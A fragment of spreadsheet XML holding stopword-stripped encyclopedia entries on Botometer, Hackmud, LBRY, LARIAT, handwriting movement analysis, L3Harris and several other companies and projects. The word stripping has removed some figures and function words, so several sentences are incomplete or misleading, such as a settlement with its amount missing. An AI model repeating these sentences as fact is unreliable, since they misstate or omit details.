rate)botometer (formerly botornot) public service checks activity twitter account gives score based likely account bot. system leverages thousand features. active method worked well detecting early spam bots honeypot accounts obvious nonsensical content posted dumbly reposted (retweeted) bots. however, recent studies show bots evolve quickly detection methods updated constantly, otherwise useless years. also references external links computational propaganda research project university oxford what social media bot? social media definition cloudflare</t>
  </si>
  <si>
    <t>Hackmud</t>
  </si>
  <si>
    <t>hackmud massively multiplayer online video game and/or simulates 1990s hacker subculture text-based adventure. players social engineering, scripting, cracks text-based terminal influence control players simulation. reviewers wrote game's "campy hacking" mimics films like wargames (1983) jurassic park (1993). references external links media related hackmud wikimedia commons official website</t>
  </si>
  <si>
    <t>Hackteria</t>
  </si>
  <si>
    <t>hackteria platform collection wiki pages open source biological projects instigated february 2009 andy gracie, marc dusseiller yashas shetty, collaboration interactivos?09 garage science medialab prado madrid. according website project develop rich wiki-based resource people interested developing projects involve bioart, open source software/open source hardware, biology, art/science collaborations electronic experimentation.hackteria designs featured book open-source joshua pearce. scidev reports hackteria trying change development done diy. wired highlighted project inspired hackteria's earlier prototypes mobile labs create darwin toolbox: portable biotechnology lab-in-a-box, developed bento lab. india, hackteria known science making. global hackteria network also pioneering cofounding recent global movement open science hardware, hardwarex, conntributed founding gosh gathering open science hardware, held first time cern geneva 2016. also do-it-yourself biology references external links official website</t>
  </si>
  <si>
    <t>Social VPN</t>
  </si>
  <si>
    <t>social virtual private network created among individual peers, automatically, based relationships established social networking service. social aims providing peer-to-peer (p2p) network connectivity user friends, easy manner hides users complexity setting maintaining authenticated/encrypted end-to-end tunnels. architecture architecture social based centralized infrastructure users authenticate, discover friends exchange cryptographic public keys, overlay used route messages endpoints. example, allows organization routed connections separate offices, organizations, internet. routed connection across internet logically operates dedicated wide area network (wan) link. packet capture injection social uses virtual network interface (such tun/tap devices windows unix systems) capture inject packets host. once captured, packets encrypted, encapsulated, routed overlay network. security social uses online social networks distribute public keys advertise node address friends. acquired public keys used establish encrypted communication endpoints. symmetric keys exchanged process establishing end-to-end link social peers. routing routing social peer-to-peer. approach implemented uses structured system sending packets encapsulated overlay messages source destination. private address space social uses dynamic address assignment translation avoid collision existing (private) address spaces hosts, allow system scale number users today's successful online social network services serve (tens millions). users able connect directly small subset total number users service, subset determined established relationships. naming social uses names derived social network service automatically assign host names endpoints. these names translated virtual private addresses overlay loop-back virtual server. related systems unmanaged internet architecture (uia)provides hoc, zero-configuration routing infrastructure mobile devices, connections established social networking infrastructure. "friend net" similar concept forth 2002 blog entry. hamachi zero-configuration uses security architecture different social vpn. leafnetworks also supports creation networks using facebook api. software open-source social implementation based facebook social network service brunet overlay available windows linux systems license. creates direct point-to-point secure connections computers help online social networks, supports transparent traversal nats. uses overlay create direct connections pairs computers (nodes). establish connection, nodes advertise node address well public keys secure communication) online social network. once node acquires node address (and public keys) node, ip-to-nodeaddress mapping created packets routed tunnel. references external links</t>
  </si>
  <si>
    <t>L3 Commercial Training Solutions</t>
  </si>
  <si>
    <t>commercial training solutions cts) flight training provider manufacturer civil flight simulators based crawley, england. subsidiary american simulator manufacturer link simulation training, part technologies, formed link simulation training 2012, acquired civil fixed-wing simulation division thales training simulation (tts). history incorporated 2006 "l-3 communications group limited", acting holding company group united kingdom. 2012, partially acquired, company's name changed "l-3 communications link simulation training limited" (l-3 link uk).in 2015, subsidiary formed, following acquisition british flight training provider aviation, july 2016, link consolidated commercial training solutions.l3 still co-located site manor royal, crawley, share ancestry, rooted simulation business created link 1930s british simulator manufacturer redifon (later rediffusion).recently, airline academy granted contract train (royal forces) multi engine aircraft pilots. products services cts's core product realityseven line full flight simulators, covers wide range aircraft types: turboprop atr72 single-aisle embraer a320, boeing wide-bodies boeing 747, boeing 767, boeing 777, boeing airbus a330, a350 airbus a380.a major part business also provision flight training services, including cadet selection, initio training airline training, bangkok, thailand, controlled asian aviation training center, acquired part deal. references external links company website</t>
  </si>
  <si>
    <t>Hacktivity</t>
  </si>
  <si>
    <t>hacktivity conference traditional event budapest, hungary official alternative representatives information security profession meet interested field framework time informal informative, sometimes in-depth technological. participants: official alternative experts information security profession, universities, colleges, professors participating training, young people participating high level education/university college students, professional trade unions. external links hacktivity home page recordings hacktivity 2015 av-portal german national library science technology</t>
  </si>
  <si>
    <t>LBRY</t>
  </si>
  <si>
    <t>lbry blockchain-based file-sharing payment network powers decentralized platforms, primarily social networks video platforms. lbry's creators also created odysee, open-source video-sharing website uses network, split separate company october 2021. video platforms built lbry, odysee, described decentralized alternatives youtube. company described odysee platforms built utilizing lbry protocol platforms free speech lightly moderates content, including removing pornography promotion violence terrorism. company technology lbry protocol decentralized file-sharing payment network built using blockchain bittorrent technology. allows anyone create account register content cannot deleted company. lbry uses bittorrent technology serve content without relying servers using peer-to-peer file-sharing. creators record video content lbry blockchain, well digital content including music, images, podcasts, e-books. lbry projects open source.in october 2017, lbry, inc. released media hosting site built atop protocol called spee.ch. stopped supported december 2019, favor lbry, inc.'s lbry.tv website. odysee, another video website built lbry, inc. using lbry protocol, entered beta september 2020 officially launched december. odysee split separate corporate entity october 2021.lbry, inc. also maintains cryptocurrency, "lbry credits" (lbc), part digital store built based lbry blockchain. using currency, creators charge viewers stream content earn tips. users platform earn using platform inviting others march 2021, u.s. securities exchange commission (sec) charged lbry, inc. selling unregistered digital asset securities. alleged lbry, inc. sold lbry credits (lbc) fund work without registering security, violation securities laws. response, lbry's began public relations campaign gather support among blockchain cryptocurrency enthusiasts, argue mislabeled security. content users lbry platform's video sharing websites described alternative youtube. spee.ch, media hosting site built atop lbry protocol, used groups deterrence dispensed upload printed firearm blueprints. when lbry, inc. stopped supporting spee.ch 2019 favor site, lbry.tv, deterrence dispensed moved lbry.tv.the lbry platform experienced surge popularity late 2020 early 2021, lbry, inc. said january 2021 user sign-ups increased 250% previous month. writing york times, nathaniel popper reported many users appeared supporters former united states president donald trump, white supremacists, rights advocates suspended youtube. robert hackett david morris writing fortune attributed increased interest lbry blockchain-based platforms choice twitter popular social networks trump many others 2021 united states capitol attack.as april 2021, odysee hosted million videos, most-viewed video falsely challenging safety covid-19 vaccines. 2021 report guardian found "scores extremist videos" odysee platform promoted antisemitic conspiracy theories, glorified adolf hitler nazis, shared covid-19 misinformation, depicted meetings rallies extremist groups including white nationalist antisemitic national justice party neo-nazi nordic resistance movement.megan squire, computer scientist researcher right-wing political extremism, described challenges faced blockchains lbry social networks built atop them: technology cool, can't pollyanna think information free there racists, people shoot other. it's going total package." extremism researcher eviane leidig, writing global network extremism technology (gnet) international centre study radicalisation political violence, described odysee "the youtube far-right", wrote although odysee "not inherently platform far-right extremist content creators", become popular among them. moderation because lbry network built blockchain, lbry, inc. moderate blockchain level users content upload. lbry, inc. able moderate content websites build protocol. lbry's odysee platform, guidelines prohibit content including pornography promotion violence terrorism. rule-breaking content delisted odysee, leaves channel content place continues allow shared, prevents found search browsing channels. most people access protocol lbry platform: websites including odysee lbry.tv built lbry blockchain.todd bookman writing hampshire public radio described odysee's approach content moderation censorship, no-deplatforming, matter users say." when asked july 2019 lbry, inc.'s sites host blueprints printed guns, lbry, inc.'s kauffman said would remove files websites courts deem illegal. champe barton writing trace said kauffman "signal[ed] support" distribution blueprints sharing personal twitter account. 2021, guardian reported lbry executive julian chandra wrote odysee site moderators "nazi makes videos superiority white race" grounds removal odysee. email accidentally sent user complained neo-nazi content platform. company lbry, inc., builds lbry protocol platform based upon founded 2015 jeremy kauffman jimmy kiselak. company based manchester, hampshire. company affiliated hampshire free state project, libertarian political migration movement willing make hampshire stronghold libertarian ideas policies.through 2015 2016, kauffman kiselak joined mike vine, josh finer, alex grintsvayg, also described co-founders. kauffman, kiselak, grintsvayg attended rensselaer polytechnic institute, played ultimate frisbee together. kauffman remains lbry's chief executive officer, grintsvayg chief technology officer, finer director operations analytics. julian chandra company's chief marketing officer. also comparison video hosting services jeremy kauffman list online video platforms references external links official website</t>
  </si>
  <si>
    <t>LARIAT (platform)</t>
  </si>
  <si>
    <t>lincoln adaptable real-time information assurance testbed (lariat) physical computing platform developed lincoln laboratory testbed network security applications. platform restricted united states military, though academic organizations also platform certain conditions.lariat designed help development testing intrusion detection (id) information assurance (ia) technologies. initially created 2002, lariat first simulated platform testing created improve upon preexisting non-simulated testbed created darpa's 1998 1999 analyses. lariat used united states military training purposes automated systems testing. function platform simulates users reflects vulnerabilities caused design flaws user interactions allows interaction real-world programs browsers office suites simulating realistic user activity applications. these virtual users managed markov models allow differently realistic way.this results realistic simulation active network users targeted malicious attacks test effectiveness attacks network defenses, also testing effectiveness intrusion detection methods software simulated real-world environment actual users amongst malicious traffic network. this done network intrusion detection software cannot easily find instances malicious network traffic mixed non-malicious network traffic generated legitimate users network.the traffic generators used testbed modified version linux, java-based graphical user interface called director provided allow users platform configure control testing parameters monitor resulting network traffic. influence cyberwarfare training programs korea institute military science technology's research center principles methodologies lariat platform development simulated threat generators cyberwarfare training. non-security contexts, systems artificial intelligence programs build principles lariat platform study simulate real-time user input activity automated testing systems. llsim lincoln laboratory designed lincoln laboratory simulator (llsim) fully virtualized java-based successor lariat single computer without need dedicated physical network hardware expensive testbeds. full replacement lariat, however, generate low-level data network packets. while makes scalable lariat since simplifies certain processes, cannot used certain testing purposes lariat utilized for. references</t>
  </si>
  <si>
    <t>Halma plc</t>
  </si>
  <si>
    <t>halma british global group safety equipment companies makes products hazard detection life protection based amersham, england. listed london stock exchange constituent ftse index. history company established 1894 ceylon nahalma estate company limited. switched rubber production 1937 became nahalma rubber estate company limited. during early 1950s company's rubber estates nationalised lankan government, 1956 company became halma investments limited, thereby severing connections rubber becoming investment industrial holding company.in early 1970s company began sequence acquisitions mechanical, electrical electronic engineering sectors. company renamed halma limited 1973 registered public limited company 1981, becoming halma plc. 1984, company acquired apollo fire detectors, largest manufacturer smoke detectors uk.the company undertook three acquisitions second half 2019, including ampac, another fire detection business, acquisitions medical sector early 2020. operations company organised follows: safety sector medical sector environmental analysis sector references external links official halma website</t>
  </si>
  <si>
    <t>Handwriting movement analysis</t>
  </si>
  <si>
    <t>handwriting movement analysis study analysis movements involved handwriting drawing. forms important part graphonomics, became established "international workshop handwriting movement analysis" 1982 nijmegen, netherlands. would become first continuing series international graphonomics conferences. first graphonomics milestone thomassen, keuss, galen, grootveld (1983). handwriting historically considered widest taught motor skill. also first, often motor skill children learn elementary school. takes years practice maturing person mastered adult handwriting skill. handwriting considered movement leaves visible trace paper (product) also considered movement (process). understanding handwriting product complete handwriting process understood. therefore, handwriting movement researched since measurement techniques became available. however, recording processing handwriting movements within reach interested studying handwriting movements, three components required: devices capture handwriting movements, laboratory computers store process movement data, computer software enables researcher specific experimental paradigms without need program untested custom software. handwriting movement analysis software also used studying drawing, eye–hand coordination, situation researcher wishes record movements using pen. earliest devices capture handwriting movements elisha gray's "telautograph", patent 386,815 (1888), followed four similar patents (1891–93). "annotated bibliography computing handwriting recognition" jean renard ward (http://users.erols.com/rwservices/biblio.html). handwriting could transmitted wire reproduced elsewhere real-time. scripture (1895) developed writing apparatus enabled storage positions paper this apparatus permitted measurement durations individual handwriting strokes (mcallister, 1900). earliest laboratory computers handwriting movements fast, non-repetitive primary frequency around bandwidth while sampling rates would theoretically suffice, up-sampling needed properly visualize lissajous-like handwriting drawing strokes. higher-than-necessary sampling rates preferred would also allow low-pass filtering smoothed data reduced equipment quantization noise factor √100/20 laboratory computer needed store, process, visualize massive numbers samples. took years computers available laboratories. electronic analog computers used digital computers came within reach research: wang laboratories, digital equipment corporation (dec), apple inc., (personal computer), norsk data, atari, osborne computer corporation, data general. most innovative mini microcomputer companies discontinued operation. movement recording devices first devices accurately record handwriting could connected computers graphics tablet, digitizer, x-y-tablet, graphics pad, electronic pens know today. among earliest tablets styalator electronic tablet computer input handwriting recognition 1957 commercial products vector general. vector general products reported position stylus claimed accuracy typical tablets sense position electromagnetically. touch-sensitive tablets cannot used hand resting tablet unless implement form hand rejection. tablets display built (e.g., tablet pc). still today, handwriting tablets gold standard record handwriting. sampling rates used decided minimum rate human input devices least bumping sampling rates advantage 15%–40% reduction device noise quantization noise. digitizer technology belongs accurate cost-effective pointing devices. dynamic accuracy 0.01 constant frequency achievable. opaque tablets produced wacom also produces display digitizers, euronovate hanvon, vistablet, adesso, genius.pen-based handwriting capturing devices developed never achieved accuracy tablets. currently many novel systems appear market "record" handwriting, anoto, also emg-based systems. many movement recording systems capture, coordinates top, also axial pressure, tilt altitude azimuth barrel. handwriting movement measurement systems capture: horizontal coordinates; parallel baseline western script vertical coordinates; perpendicular horizontal base line writing surface. axial pressure; pressure data often non-linearly related actual pressure, orientation needed estimate normal pressure.optionally, digitizers deliver orientation barrel relative tablet: altitude steep held; angle used estimate pressure perpendicular paper axial pressure. azimuth direction barrel projected plane.ideally, coordinates sampled simultaneously fixed frequency, include times stamps coordinate correct non-isochronous sampling. additional features measured digitizers (mostly past models) include height, barrel rotation, grip forces (e.g., finger grip areas). handwriting movement analysis software handwriting movements studied many disciplines including kinesiology, human movement science, biomechanics hand, fine motor control, handedness, human-computer interaction, visuomotor control, visual feedback, goal-directed movements, drawing, experimental psychology, psychiatry, extrapyramidal symptoms (eps) movement side effects medication, neurology, movement disorders, parkinson's disease, dystonia, writer's cramp, physiotherapy, remedial handwriting instruction, occupational therapy, child development, developmental disorders, education, elementary education, home schooling, reeducation, linguistics, language, communication, stuttering, forensic document examination, document analysis, forensic document examination questioned document examination, signature verification identification, handwriting image analysis, computer science, artificial intelligence, handwriting recognition, etc. next wave consisted packaged software could made available record handwriting many locations. most initial software systems developed university researchers who, often, ones capable using even today, major accomplishment make software available package installed unknown computer used brief familiarization time users involved. over last several years, software packages appeared market used many researchers interested field handwriting movement analysis. cswin first handwriting movement analysis offered sale (around 1980) cswin science motion developed christian marquardt norbert munich, germany. cswin marketed germany used many german hospitals. used treating writer’s cramp patients. present company focuses golf training established 2003 owner, christian marquardt. their oldest publication marquardt (1994). oasis another early system oasis kikosoft, netherlands, established 1995 peter jong. oasis customized flexible macro language. 1998, system used develop automated test-battery psychopharmacological research: orgabat. oldest references oasis jong, hulstijn, kosterman, smits-engelsman (1996). pullman spiral acquisition analysis columbia university, prof. seth pullman developed pullman spiral acquisition analysis. used test tremor parkinson patients. 2002, pullman received patent 6,454,706: "system method clinically assessing motor function". patients motor disorders parkinson's disease draw spirals. software calculates first-order smoothness, second-order smoothness, tightness spiral, zero-crossing rate, second-order zero-crossing rate, derives score degree severity score. their system enables objectively assessing motor function physicians skilled experienced evaluating motor disorders, example general practitioners pediatricians certified practice neurology. early publication spiral analysis pullman (1998). neuroskill another handwriting analysis system neuroskill verifax, boulder, colorado, usa, founded 1990 ruth shrairman alex landau. neuroskill designed biometric measurement, security purposes, parkinson medication effects many applications movement disorders. verifax began operations developing biometric tool verification signatures distance (verifax autograph technology). verifax developed applications using application-specific modifications customized neuroskill software: applications substance abuse screening detection, monitoring toxic inhalants environmental distress, accurate signature identification security/privacy protection forgery detection. target markets could include neuromuscular disease centers, drug alcohol abuse clinics, occupational health centers security industry. process, applied technology biometric measurements clinical monitoring tool physicians investigating neuromuscular diseases. 2003, neuroskill received patent 6,546,134: "system assessment fine motor control humans". their method estimates stability, smoothness synchronization writer's motion quantifying measures neurological function using correlation function analysis (cfa) behavioral signals. returns numerical scores charts expressing stability handwriting strokes characteristics phase distortions reproducing cursive samples. another application evaluate persons critical skills (e.g., airline pilots, drivers) physical mental performance impairments caused stress, physiological disorders, alcohol drug abuse using proprietary verifax impairoscope writing instrument. this last application raised possibility using space-qualified impairoscope variant evaluate astronaut performance respect impacts stress, fatigue, excessive workload, build-up toxic chemicals within space habitat, etc. 2009, ineuroskill portal established business entity: ineuroskill. website enables parkinson patients upload signatures recorded using digitizing tablet. they receive immediate feedback regarding fine motor function form chart analysis. their oldest article morgenthaler, shrairman, landau (1998). movalyzer movalyzer developed neuroscript, tempe, usa. neuroscript founded 1997 prof. george stelmach, since retired, hans-leo teulings. 1999 gregory baker joined movalyzer’s designer implementer. this handwriting movement analysis software first demonstrate discern movement side-effects schizophrenia medication better conventional evaluation method used psychiatry today (international patent pending) (caligiuri al., 2009a, movalyzer currently handwriting movement analysis software certified microsoft windows vista. integrated matlab perform image processing scanned handwriting exemplars. used fields ranging research human movement sciences, kinesiology, psychology, education, aging research, psychiatry, neurology, occupational therapy, forensic document examination, computer science (handwriting recognition, signature verification), educational demonstrations student projects fields. oldest references movalyzer teulings romero (2003), teulings gemmert, (2003), romero teulings (2003). compet university haifa, sara rosenblum patricia (tamar) weiss colleagues developed computerized handwriting evaluation system called poet: penmanship objective evaluation tool using matlab. used administer visual stimuli record analyze handwriting movements. they researched phenomenon: movements paper (air strokes). oldest mention poet rosenblum, parush, epstain, weiss (2003). soon afterward, poet developed renamed compet: computerized penmanship evaluation tool. used study children dysgraphia, developmental coordination disorders (dcd) adults several pathologies multiple sclerosis (ms) depression, alzheimer, parkinson well aging effects. also used verbal-based detection technology polygraph. software developed university poitiers (france) synchronously record handwriting mouvements. first version aims studying periods pause writing text production (g-studio; 1994). after complete rewriting support ms-windows, mouvement recording added insight reading writing information retrieval. evolution fruit collaborations handwriting researchers, mostly psychology university poitiers (denis alamargot, eric lambert, cyril perret, thierry olive). integrates audio recording, synchronization signals (from/to computers, software devices), data tagging tools well various data filtering extraction modules, opening ways multimodal researches. after commercial distribution (2004-2018), freely distributed. oldest references chesnet alamargot (2005), alamargot, chesnet, dansac, ros, (2006). meddraw meddraw computer-based drawing-task diagnosis rehabilitation system project university kent, university rouen, france, coordinated richard guest started 2003. project aims develop robust, state-of-the art, easy clinical system producing objective diagnostic recommendations across range clinical conditions. their focus detect spatial neglect visual field organization movement disorder. they remain focused drawing-based diagnosis disorders. first research publications mention meddraw kaplani, guest, fairhurst (2005), glenat, heutte, paquet, mellier (2005). programme goes offline since 2006. extended drawing test (edt) extended drawing test computerized graphonomic assessment hand function. measures ability subject draw vertical lines, left right hands. compare performance gross movements fine finger control, subjects draw lines holding either tablet's (held fingers) mouse (held whole hand). latter movements include finger movements. norms established 70-year-old healthy persons. deviations healthy norms reflect different pathologies different patient groups, e.g., hemiplegic stroke patients. first paper mentioning vuillermot, pescatore, holper, kiper, (2009). also related fields asemic writing questioned document examination calligraphy graphonomics doodle movalyzer handwriting movement analysis software references alamargot, chesnet, dansac, ros, (2006). pen: device study reading writing. behaviour research methods, instruments computers, 38(2), 287-299. pen: device studying reading writing caligiuri, m.p., teulings, h.l., dean, c.e., niculescu, a.b., lohr, j.b. (2009a). handwriting movement kinematics quantifying patients treated atypical antipsychotics. psychiatry research press). caligiuri, m.p., teulings, h.l., dean, c.e., niculescu, a.b., lohr, j.b. (2009b). handwriting movement analyses monitoring drug-induced motor side effects schizophrenia patients treated risperidone. human movement sciences press). chesnet, alamargot, (2005). analyse temps réel activités oculaires grapho-motrices scripteur intérêt dispositif l'année psychologique, 105(3), 477-520. analyse temps réel activités oculaires grapho-motrices scripteur intérêt dispositif chesnet guillabert espéret e.(1994). g-studio logiciel pour l'étude temps réel paramètres temporels production écrite. l'année psychologique, 94(2),283-293. g-studio logiciel pour l'étude temps réel paramètres temporels production écrite jong, w.p., hulstijn, kosterman, b.j.m., smits-engelsman, b.c.m. (1996). oasis software application experimental handwriting research. m.l. simner, c.g. leedham, a.j.w.m. thomassen (eds.), handwriting drawing research: basic applied issues (pp. 429–440). amsterdam: press. glenat, s.,heutte, paquet, t.,mellier, (2005). computer-based diagnosis dyspraxia: meddraw project, appear 12th conference international graphonomics society, 2005, salerno, italy, june 2005. kaplani, guest, r.m., fairhurst, m.c. (2005). feature-based assessment visuospatial neglect severity computer-based line cancellation task, 12th conference international graphonomics society, 2005, salerno, italy, june 2005. marquardt, mai, (1994). computational procedure movement analysis handwriting. neurosci methods. apr;52(1):39–45. mcallister, c.n. (1900). research: movement used handwriting. yale psychological laboratory, 21–63. morgenthaler, g.w., shrairman, landau, (1998). space technology applications international forum 1998. conference proceedings, volume 420, 736–742 (1998). pullman, (1998). spiral analysis: technique measuring tremor digitizing tablet. disord. suppl 3:85–9. romero, d.h., teulings, h.l. (2003). submovement analysis goal-directed movements. h.l. teulings, gemmert, a.w.a. (eds.), proceedings 11th conference international graphonomics society (igs2003), november 2003, scottsdale, arizona, usa. isbn 0-9746365-0-9. 103–106). rosenblum, parush, epstain, weiss, p.l. (2003). process versus product evaluation poor handwriting among children developmental dysgraphia adhd. h.l. teulings a.w.a. gemmert. proceedings 11th conference international graphonomics society. usa; scottsdale arizona. 169–173. scripture, e.w. (1895). apparatus. studies yale psychological laboratory, iii, 106. teulings, h.l., maarse, f.j. (1984). digital recording processing handwriting movements. human movement science, 193–217. teulings, h.l. romero, d.h. (2003). submovement analysis learning cursive handwriting block print. h.l. teulings, a.w.a. gemmert (eds.), proceedings 11th conference international graphonomics society (igs2003), november 2003, scottsdale, arizona, usa. isbn 0-9746365-0-9. 107–110). teulings, h.l. gemmert, w.a. (2003). goal-directed movements menu selection computer-user-interfaces. h.l. teulings, gemmert, a.w.a. (eds.), proceedings 11th conference international graphonomics society (igs2003), november 2003, scottsdale, arizona, usa. isbn 0-9746365-0-9. 99–102). thomassen, a.j. w.m., keuss, p.j.g., galen, g.p., grootveld, (eds.) (1983). motor aspects handwriting. acta psychologica, vol. vuillermot, pescatore, holper, kiper, eng, (2009). extended drawing test assessment hand function performance invariant healthy subjects. journal neuroscience methods 177(2): 452–460. external links annotated bibliography references handwriting recognition computing notes history pen-based computing (youtube)</t>
  </si>
  <si>
    <t>LA Hacks</t>
  </si>
  <si>
    <t>hacks annual student-led hackathon hosted university california, angeles (ucla)'s pauley pavilion. according ucla 2020, southern california's largest annual hackathon. history hacks co-founded ucla students hadar alvin hsia. inaugural event held april 27–28, 2013 crosscampus santa monica. there people attendance students universities across southern california competed hours event. april 2014, 4,000 people registered 1,300 1,500 participants. this held ucla's pauley pavilion hours. special guests came speak hacks, including evan spiegel, founder snapchat, alexis ohanian, co-founder reddit, baiju bhatt, co-founder robinhood, adam singolda, taboola. their hacks judged tech industry professionals (i.e. altman president combinator, chris wolfe founder myspace).in april 2016, angeles 2024 summer olympics signed sponsor. committee presented challenges students asked create apps would promote fitness enhance experience live sporting events.la hacks 2020 hosted virtually covid-19 pandemic. references</t>
  </si>
  <si>
    <t>L3Harris Technologies</t>
  </si>
  <si>
    <t>l3harris technologies (l3harris) american technology company, defense contractor, information technology services provider produces c6isr systems products, wireless equipment, tactical radios, avionics electronic systems, night vision equipment, terrestrial spaceborne antennas government, defense, commercial sectors. they specialize surveillance solutions, microwave weaponry, electronic warfare. formed merger technologies (formerly communications) harris corporation june 2019, expected sixth-largest defense contractor united states. history "harris automatic press company" founded alfred harris niles, ohio, 1895. company spent next years developing lithographic processes printing presses acquiring typesetting company intertype corporation. 1967, merged radiation, inc. melbourne, florida, developer antenna, integrated circuit, modem technology used space race. company headquarters moved cleveland melbourne 1978. 2015, harris finalized purchase competitor exelis inc., almost doubling size original company.l-3 communications formed 1997 acquire certain business units lockheed martin previously part loral corporation. these units belonged lockheed corporation martin marietta, merged three years 1993. company founded (and named for) frank lanza robert lapenta partnership lehman brothers. lanza lapenta served executives loral lockheed. company continued expand mergers acquisitions become u.s. government contractors. 2016, company changed name communications holdings, inc. technologies, inc. better reflect company's wider focus since founding 1997.in october 2018, harris announced all-stock "merger equals". part deal, harris required sell night vision division; reasoning merger harris l3's night vision departments would create effective monopoly night vision industry. merger completed june 2019, company, l3harris technologies, inc., based melbourne, florida, harris headquartered. company former harris william brown chairman ceo, former president coo. june 2021, brown turned role chris kubasik, retaining title executive chair, kubasik adding title vice chair.in 2018, l3harris acquired australian cybertechnology companies azimuth security, linchpin labs. companies reportedly suppliers zero-day exploits five eyes, federal bureau investigation.in january 2022, l3harris reorganized business structure, eliminating aviation systems business segment distributing divisions remaining three integrated mission systems, space airborne systems, communications systems segments.in june 2022, chris kubasik succeeded chair following bill brown's retirement. business organization 2022, l3harris organized three business segments: integrated mission systems, space airborne systems, communication systems. 13-member board directors, including chair chris kubasik. integrated mission systems headquartered palm bay, florida, integrated missions systems specializes intelligence, surveillance, reconnaissance (isr) signals intelligence systems; electrical electronic systems maritime use; electro-optical systems including infrared, laser imaging, targeting systems; defense aviation systems including weapons systems uavs; commercial aviation solutions, including avionics, collision avoidance systems, flight recorders, flight simulators, pilot training. comprises divisions, including formerly aviation systems segment wescam, combined revenue $7.0 billion 2021. space airborne systems headquartered palm bay, florida, space airborne systems specializes space mission, payloads, sensors satellite navigation, isr, weather, missile defense; ground systems space command control tracking; optical wireless networking situational awareness traffic management; defense avionics; electronic warfare countermeasures. comprises divisions, including formerly aviation systems segment, combined revenue $6.0 billion 2021. communications systems headquartered rochester, york, communications systems specializes tactical communications, broadband communications, night vision (inherited technologies, unrelated night vision developed harris, itt, exelis), public safety. comprises divisions combined revenue $4.3 billion 2021. controversies 2013, l3harris provided mobile interception services clients enforcementin 2019, l3harris paid million settle allegations harris, merger, violated arms export control international traffic arms regulations regulations. according proposed charging letter harris corporation violated aeca (22u.s.c.2751 seq.) itar parts 120–131) total separate violations. proposed charging letter outlines following violations: unauthorized exports technical data form software unauthorized exports tactical radios unauthorized exports military electronics canada unauthorized exports remote controlled vehicle, an/plm-4 radar signal simulator, jagwire software plugin unauthorized exports technical data related night vision equipment tactical radios providing false part statement technical assistance agreement violation license provisos violation terms conditions licenses agreements violations caused systemic administrative issuesin june 2022, reported held talks purchase israeli company nso, builds pegasus. white house officials heard talks, voiced opposition, l3harris said discontinued plans. products avcatt, mobile aviation training simulator stingray hailstorm phone trackers. opensky wireless communication system tcas, products aviation communication surveillance systems product line, serviced managed oemservices l3harris command control battle management suite—former "harris command control" integrated core processor, main computer f-35 lightning c-130j super hercules gpnvg-18, night vision device utilises four night vision tubes give user wider field view an/pvs-31a bnvd 1531 bnvd. binocular articulating night vision devices. standard issue goggle socom. azimuth, technology enabling access data locked mobile phones. l3harris acquired azimuth 2018 acquisition australian company, azimuth security. also references external links official website business data l3harris technologies:</t>
  </si>
  <si>
    <t>L3 Technologies</t>
  </si>
  <si>
    <t>technologies, formerly communications holdings, american company supplied command control, communications, intelligence, surveillance reconnaissance (c3isr) systems products, avionics, ocean products, training devices services, instrumentation, aerospace, navigation products. customers included department defense, department homeland security, united states intelligence community, nasa, aerospace contractors, commercial telecommunications wireless customers. 2019, merged harris corporation renamed l3harris technologies.l3 headquartered murray hill, manhattan, york city. history formed communications 1997 acquire certain business units lockheed martin previously part loral corporation. these units belonged lockheed corporation martin marietta, merged three years 1993. company founded (and named for) frank lanza robert lapenta partnership lehman brothers. lanza lapenta served executives loral lockheed. acquisitions 1997paramax systems corporation lockheed martin. loral acquired paramax 19952000training simulation division raytheon systems co., based arlington, texas. this company formerly known hughes training, inc., part hughes aircraft defense group purchased raytheon general motors years earlier. division traces ancestry original company formed edwin link, inventor link trainer airplane simulator, accordingly renamed link simulation training (now known link training simulation).2001kdi precision products, batavia, ohio. electronic fuzing, safe devices. litton electron devices northrop grumman (renamed electron devices)2002raytheon aircraft integration systems (renamed integrated systems; greenville, texas facility known mission integration division, waco, texas facility known platform integration division) sycoleman corporation, came joining technologies coleman research corporation. perkinelmer detection systems perkinelmer became security detection systems. wescam (currently named harris wescam) developer gyro-stabilized, eo-ir imaging systems.2003ship analytics, inc. goodrich avionics communication bombardier aerospace.2004cincinnati electronics, mason, ohio. infrared detectors systems, space avionics.2005titan corp., failed buyout attempt lockheed martin. communication combat propulsion systems, previously owned general dynamics land systems. communications mapps, previously cae's marine controls unit electron dynamic devices boeing satellite systems. applied signal image technology, linthicum heights, geo-location systems emitters. sonoma design group, santa rosa, stabilized eo/ir sensors.2006advanced system architectures, company based fleet, hampshire, united kingdom. core capabilities development through-life management complex information systems, data fusion tracking solutions, interoperable secure communications systems. crestview aerospace, company based northwest florida. crestview aerospace provides aircraft structures, major airframe assemblies, military aircraft modifications leading prime contractors oems aerospace industry. (sold 2017 along vertex aerospace tcs.) nautronix maripro, based fremantle, australia santa barbara, california, respectively, nautronix aberdeen, scotland. nautronix maripro provide acoustic ranges hydrographics commercial defense markets. technology, specialist defense electronics company based gloucestershire, technology internationally known development innovation fields interception, surveillance, electronic warfare, communications.2010insight technology, company based londonderry, hampshire. insight develops builds optics, night-vision goggles weapon-mounted sights lasers.2012thales training simulation (partial), multinational company manufactures civil military full flight simulators provides related training support services wholly owned subsidiary thales group. august 2012, acquired thales group's civil fixed-wing flight simulation business, form link simulation training uk.2015ctc aviation limited (rebranded 2017 airline academy) company based southampton providing training resourcing many international airlines.2016macdonald humfrey (automation), luton, uk–based checkpoint security automation company. exmac (automation), droitwich, based automated material handling company.2017open water power, somerville, massachusetts–based battery startup spun mit. novel aluminum-water battery technology promises tenfold improvement endurance unmanned underwater vehicles. ocean-server technology, fall river, massachusetts–based small business specializing lithium-ion battery, sensor, robotic mini-sub (uuv) products global, lafayette, louisiana–based business international offices portchester specializing autonomous surface vehicles commercial defense markets.2018in october 2018, announced all-stock "merger equals" florida-based harris corporation, closed (subject approvals) mid-2019. merger completed june 2019, company, l3harris technologies, inc., based melbourne, florida, harris headquartered. business organization 2017, organized four business segments: electronic systems advanced programs aviation products security power propulsion systems precision engagement training aerospace systems aircraft systems systems vertex aerospace communication systems advanced communications broadband communications space power tactical satcom sensor systems space sensor systems maritime sensor systems worldwide surveillance targeting missions warrior sensor systems management frank lanza, co-founder, died june 2006. michael strianese named interim ceo, later appointed chairman, president company october 2006. 2015, former lockheed martin executive christopher kubasik named president coo, strianese remaining chairman ceo. july 2017, strianese announced would retire december 2017, succeeded kubasik, would remain board chairman. january 2018, christopher kubasik became chief executive officer president technologies. naming technologies originally named communications last initials founders frank lanza, robert lapenta, lehman brothers. despite similarity naming, corporate connection technologies, formerly known communications, networking provider level communications, whose name often abbreviated "l3" 